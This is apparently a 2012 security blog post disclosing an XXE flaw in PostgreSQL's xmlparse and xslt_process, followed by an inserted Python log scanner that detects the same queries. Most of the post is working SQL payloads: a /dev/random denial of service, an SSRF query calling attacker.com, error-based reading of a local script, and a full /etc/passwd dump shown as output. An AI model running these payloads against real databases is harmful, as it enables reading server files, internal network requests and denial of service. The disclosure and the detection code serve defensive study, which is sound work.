Friday, June 1, 2012

PostgreSQL (all) error-based XXE 0day

We recently found, and published at PHDays, a 0-day error-based XXE vulnerability in PostgreSQL.
Currently an attacker can use it to read parts of local files and to make requests from the DB server to the intranet (SSRF, Server-Side Request Forgery).

Example:
DoS:
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/dev/random">]><content>&abc;</content>')

SSRF:
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "http://attacker.com/?xxe=OK">]><content>&abc;</content>')

Error-based XXE:

select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;</content>');

ERROR:  invalid XML document
DETAILS:  /etc/network/if-up.d/mountnfs:28: parser error : StartTag: invalid element name
exec 9<&0 </etc/fstab
       ^
/etc/network/if-up.d/mountnfs:28: parser error : xmlParseEntityRef: no name
exec 9<&0 </etc/fstab
        ^
/etc/network/if-up.d/mountnfs:28: parser error : chunk is not well balanced
exec 9<&0 </etc/fstab
          ^
Entity: line 1: parser error : Failure to process entity abc
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;
                                                                               ^
Entity: line 1: parser error : Entity 'abc' not defined
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;
                                                                                ^

UPDATE!
A classic XXE via XSLT transformation was also found.
It makes reading any data possible as well:


SELECT xslt_process('<!DOCTYPE employee [<!ENTITY asd SYSTEM "/etc/passwd">] ><employee><name>&asd;</name><age>30</age><pay>400</pay></employee>'::text, $$<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"><xsl:template match="*">  <xsl:element name="samples">    <xsl:element name="sample"><xsl:value-of select="//employee/name/text()"/> </xsl:element>  </xsl:element></xsl:template></xsl:stylesheet>$$::text, 'n1=v1,n2=v2,n3=v3,n4=v4,n5=v5'::text);
                                     xslt_process                                    
-----------------------------------------------------------------------------------------
 <?xml version="1.0"?>
 <samples><sample>root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/bin/sh
 man:x:6:12:man:/var/cache/man:/bin/sh
 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 mail:x:8:8:mail:/var/mail:/bin/sh
 news:x:9:9:news:/var/spool/news:/bin/sh
 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 proxy:x:13:13:proxy:/bin:/bin/sh
 www-data:x:33:33:www-data:/var/www:/bin/sh
 backup:x:34:34:backup:/var/backups:/bin/sh
 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
 libuuid:x:100:101::/var/lib/libuuid:/bin/sh
 nslcd:x:101:103:nslcd name service LDAP connection daemon,,,:/var/run/nslcd/:/bin/false
 sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
 puppet:x:109:111:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
 Debian-exim:x:111:115::/var/spool/exim4:/bin/false
 alexandro:x:1000:1000:Alexander Golovko,,,:/home/alexandro:/bin/bash
 oxod:x:1001:1001:,,,:/home/oxod:/bin/bash
 mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false
 postgres:x:104:107:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
 oracle:x:1002:1002::/u01/app/oracle:/bin/bash
 </sample></samples>

(1 row)
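
The detection side of the queries above, as an added example that is not part of the original post: a Python scan of statement-log lines for `xmlparse` / `xslt_process` calls whose XML declares an external entity, with the entity target labelled for triage. The log lines and the `intranet.example` host are constructed, and the `LOG:  statement:` shape assumes statement logging (`log_statement`) is enabled.

```python
import re

# Calls the post shows reaching the XML parser: xmlparse() and xml2's xslt_process().
XML_CALL = re.compile(r"\b(xmlparse|xslt_process)\s*\(", re.I)
# External entity declaration: <!ENTITY name SYSTEM "target"> or PUBLIC "id" "target".
EXT_ENTITY = re.compile(
    r"""<!ENTITY\s+(?:%\s*)?([\w.:-]+)\s+(?:SYSTEM|PUBLIC\s+(?:"[^"]*"|'[^']*'))\s*"""
    r"""(?:"([^"]*)"|'([^']*)')""", re.I)

# Constructed sample in the shape of a statement log; the host name is a placeholder.
SAMPLE_LOG = """\
LOG:  statement: select xmlparse(document '<content>plain</content>')
LOG:  statement: select xmlparse(document '<!DOCTYPE content [ <!ENTITY abc SYSTEM "http://intranet.example/?xxe=OK">]><content>&abc;</content>')
LOG:  statement: SELECT xslt_process('<!DOCTYPE employee [<!ENTITY asd SYSTEM "/etc/passwd">] ><employee><name>&asd;</name></employee>'::text, '<xsl:stylesheet/>'::text)
LOG:  statement: select note from docs where note like '%<!ENTITY%'
""".splitlines()


def classify(target):
    """Triage label for the entity's system identifier."""
    if re.match(r"(?i)(https?|ftp)://", target):
        return "outbound-request"   # the DB host would fetch a URL (SSRF)
    return "local-file"             # plain path or file:// URI


def scan(log_lines):
    """Return (line_no, function, entity, target, kind) per external entity found."""
    hits = []
    for no, line in enumerate(log_lines, 1):
        call = XML_CALL.search(line)
        if not call:
            continue                # statement never reaches the XML parser
        text = line.replace("''", "'")   # undo SQL doubling of single quotes
        for m in EXT_ENTITY.finditer(text):
            target = m.group(2) if m.group(2) is not None else m.group(3)
            hits.append((no, call.group(1).lower(), m.group(1), target, classify(target)))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The scan only sees XML that appears literally in the logged statement; documents assembled from table data or string concatenation will not match.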

4 comments:

  1. I'd like to note that xslt_process is from the xml2 postgres module, which is being deprecated [1]. E.g. in psql 9.1.3 it is turned off by default.

    PS. That's why I wasn't able to discover this file-reading during phdays =)

    [1] http://www.postgresql.org/docs/9.1/static/xml2.html
